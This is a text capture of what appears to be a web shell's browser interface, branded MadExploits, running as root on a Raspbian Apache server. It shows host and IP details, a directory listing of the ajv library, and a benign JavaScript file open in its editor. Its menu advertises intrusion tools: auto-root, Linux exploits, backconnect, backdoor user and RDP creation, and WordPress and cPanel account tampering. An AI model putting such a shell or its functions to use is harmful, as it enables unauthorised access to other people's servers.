Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
nodejs /
ajv /
lib /
compile /
[ HOME SHELL ]
Name
Size
Permission
Action
_rules.js
1.19
KB
-rw-r--r--
async.js
2.58
KB
-rw-r--r--
equal.js
1.12
KB
-rw-r--r--
error_classes.js
828
B
-rw-r--r--
formats.js
11.48
KB
-rw-r--r--
index.js
9.94
KB
-rw-r--r--
resolve.js
7.71
KB
-rw-r--r--
rules.js
1.68
KB
-rw-r--r--
schema_obj.js
133
B
-rw-r--r--
ucs2length.js
558
B
-rw-r--r--
util.js
7.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ucs2length.js
'use strict'; // https://mathiasbynens.be/notes/javascript-encoding // https://github.com/bestiejs/punycode.js - punycode.ucs2.decode module.exports = function ucs2length(str) { var length = 0 , len = str.length , pos = 0 , value; while (pos < len) { length++; value = str.charCodeAt(pos++); if (value >= 0xD800 && value <= 0xDBFF && pos < len) { // high surrogate, and there is a next character value = str.charCodeAt(pos); if ((value & 0xFC00) == 0xDC00) pos++; // low surrogate } } return length; };
Close